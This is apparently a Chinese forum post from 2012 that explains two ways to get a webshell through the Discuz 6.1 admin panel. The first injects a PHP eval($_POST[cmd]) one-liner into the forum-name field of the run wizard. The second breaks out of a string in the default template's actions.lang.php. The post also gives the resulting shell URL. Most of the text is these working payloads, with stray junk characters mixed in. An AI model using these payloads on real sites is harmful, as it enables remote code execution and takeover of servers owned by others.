discuz6.1两种方法后台拿shell/ l, A9 X4 t7 B8 j
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下+ \: r$ @& T0 E$ P' e: n! P
1:& X2 O! w1 E" s5 c
http://127.0.0.1/discuz/admincp. ... zard&frames=yes: t& h% x; J L* ^
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell' D* B- `% ~! x2 |( A0 z8 Z5 X% q% V
<?php eval($_POST[cmd]);?>
. U( T; V4 m" {3 y; P& t3 {6 k5 G* J后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php9 k) z* F+ A C) V, P5 J, o' T
$ n X, P6 E, p, N6 r5 R' g. p- i+ b
* U( s8 b0 U K0 m4 Z5 r+ ~/ `
2:后台模板管理--默认模板套系--详情; U- Y% O1 g! h4 [2 D$ i: J
templates/default/actions.lang.php; @8 y* M9 P! b
jhackj\\');eval($_POST[cmd])?>;//
; c' I! q0 Q* G, c8 H
& I$ L' h' o& @" P7 E* t# ]7 g利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对